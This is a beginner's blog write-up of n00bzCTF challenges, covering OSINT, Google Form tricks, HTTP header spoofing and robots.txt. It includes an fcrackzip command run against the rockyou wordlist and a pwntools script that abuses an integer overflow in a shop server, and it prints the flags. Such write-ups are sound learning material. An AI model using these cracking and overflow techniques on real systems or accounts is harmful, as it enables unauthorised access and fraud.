vicevirus’ Blog

Recently, I came across an exciting event called n00bzCTF that specifically caters to beginners like me. Together with my teammates — ayxp, and kubi3 — we took on the challenges presented by n00bzCTF with great enthusiasm. The best part? This event was created to make cybersecurity accessible and friendly for complete beginners, just like us n00biezs! In the short time since we started, we have already overcome several challenges and gained a wealth of knowledge. Full credits to my teammates ayxp and kubi3 for solving most of these challenges.

This is a wierd png file. I hope you can make some sense out of it!

1. We were given an image filled with hand signs.

   

2. Next, we just have to refer to google and find their respective meaning for each handsign and you will find the flag! 

Flag : n00bz{americanhandsigndecoded}

Binary Flag Checkers are old, so how about some Google Forms Flag Checker?

1. For this challenge, a google form is given and somehow we need to find the flag… seems like a really fun challenge…

   

2. We tried inserting every single thing symbols, whitespaces, and few other things into the flag checker, checking view analytics, and we were unsuccessful… what are we supposed to do here exactly.. ?
3. Then, we tried view-source aannnddd we found the flag.

Flag : n00bz{1n5p3ct_3l3m3n7_ftw!}

What’s a good challenge without a second part? Anyways make sure to VisIt thE neW link because it has been updated PREVIOUSly because I had too many RESPONSES.

1. Next challenge is still about Google Form..Google Form 2

   

2. We doesn’t take too much time here.. we just did viewanalytics by changing the google form url from https://docs.google.com/forms/d/e/1FAIpQLScu-EQD_7Kc1aF1FaHxX0JHypbWbd5oLy513nm9Prsdo6c7Dg/viewform into https://docs.google.com/forms/d/e/1FAIpQLScu-EQD_7Kc1aF1FaHxX0JHypbWbd5oLy513nm9Prsdo6c7Dg/viewanalytics.
3. From viewform to viewanalytics.
4. Aaand we found the flag for Google Form 2!

Flag : n00bz{7h1s_1s_th3_3nd_0f_g00gl3_f0rm5_fl4g_ch3ck3rs}

Just Crack & Crack!

1. A zip file is given. It’s locked with a password.. probably have to crack it..

   

2. For this challenge, to crack a zip we used fcrackzip with the rockyou wordlist.fcrackzip -u -D -p rockyou.txt flag.zip -v

Password 1337h4x0r

1. We have successfully cracked the zip file and we found a pdf file locked with a password inside..

1. Next thing we did is, we tried to crack the pdf file. We could use something like pdfcrack to crack this pdf file.Found the password noobmaster

1. Opening the pdf file gives us the flag.

Flag : n00bz{CR4CK3D_4ND_CR4CK3D_1a4d2e5f}

Damn bro, Dam! – Note: Find out the city that this dam is in. Flag format is n00bz{City_Name}

1. An image of a dam is given to us.Dam picture

   

2. We used google image search and found few interesting results.Search results

   

3. Further inspection and research we found that the dam is in Nova Kakhovka

Flag: noobz{Nova_Kakhovka}

• *A mission, had planned to land on the moon. Can you find where it planned to land on the moon and the name of the lander and rover? Flag is latitude longitude upto one decimal place. **

Note: Due to a quite big range of answers, to narrow down your search, use the latitude and longitude provided from this site: blog.jatan.space

1. An image of a space thingy like thing (I don’t know what it is) is given to us.Mission Moon

   

2. Same thing, we did reverse image search and we found the exact image on the exact specified website.

   

3. Further reading and inspection on the article, we found the flag!

Flag : n00bz{Vikram_Pragyan_70.9_22.8}

Can you help me pass the right input to get the flag?

1. An elf file is given for us to inspect and get the flag.ELF File

   

2. First thing we did is to check the strings by using the strings command.
3. Aaand we found the flag!.Flag found

Flag : n00bz{N3v3R_$torE_$ENs1TIV3_1nFOrMa7IOn_P1aiNtexT_In_yoUr_bin4rI3S!!!!!}

Can you get in the club?

1. A webpage is given. When you click on ‘check status’ it will send you to a page where you are not a member.

   

2. At first, we tried checking the cookies, requests headers, and few other things and we weren’t successful.
3. Turns out the challenge is not that hard.. you just have to input the word ‘radical’ inside the GET request on check status.
4. It will be something like thishttp://challs.n00bzunit3d.xyz:8080/check?secret_phrase=radical
5. And you will find the flag!

Flag : n00bz{see_you_in_the_club_acting_real_nice}

Dang, if only there was some standardized way to tell webcrawlers how to index your site. I guess we have to build our own :shrug:

1. This one is pretty easy. We were given a page with the text written ‘Where are the robots?’.

   

2. We can just access /robots.txt and we will find the flag!

Flag : n00bz{1_f0und_7h3_r0b0ts!}

To get the flag, you must be a member of the secret group!

1. For this challenge, you are supposed to send HTTP Requests according to the specified message in the page.
2. We will be using postman to simulate the HTTP Requests

   

3. We then set a header based on the message given on the web. Keep on adding header until it gives us a flag.
4. Set User-Agent header to n00bz-4dm1n.

   

5. Set Accept header to fl4g.

   

6. Set Connection header to s3cur3.

   

7. Set Referer header to s3cr3t.n00bz-4dm1n.xyz.

   

8. Add a Give-Flag header with value 7ru3.

   

9. And you will find the flag!

Flag : n00bz{y0u_4r3_n0w_4_v4l1d_m3mb3r_0f_th3_s3cr3t_gr0up!}

Come and buy yourself a flag!

nc challs.n00bzunit3d.xyz 50267

1. We tried connecting to the pwn server and we were greeted with something like a shop.

   

2. First, we checked the account balance with an initial balance of $100, and we tried to buy the real flag. And of course, we were unsuccessful because we didn’t have enough money

   

3. What we could buy is the fake flag… but if I bought too much in this case, my balance becomes negative.

   

4. Well, what if I tried to buy at an insane amount like 9999999999999?

   

5. Noticed how my balance went up from $100 to $150? We could repeat the same thing and increase our balance until we can buy the real flag.
6. So, I created a script to make things easier for me and eventually buy the flag.

from pwn import *

def pwn_script():
    # Set up the connection
    conn = remote('challs.n00bzunit3d.xyz', 50267)

    # Send inputs and receive output
    for i in range(1, 11):
        conn.sendline(b'2')
        conn.sendline(b'999999999999999')
        output = conn.recvline().decode().strip()
        print("Output after sending '2' and '999999999999999' (iteration", i, "):", output)

    # Send '3' after 10 iterations
    conn.sendline(b'3')
    output = conn.recvline().decode().strip()
    print("Output after sending '3':", output)

    # Enter interactive mode
    conn.interactive()

    # Close the connection
    conn.close()

# Run the script
pwn_script()

Running the script, and buying the real flag… and you will get the flag!

Flag : n00bz{5h0p_g0t_h3ck3d_4nd_fl4g_g0t_570l3n!}

Thanks for reading my writeup!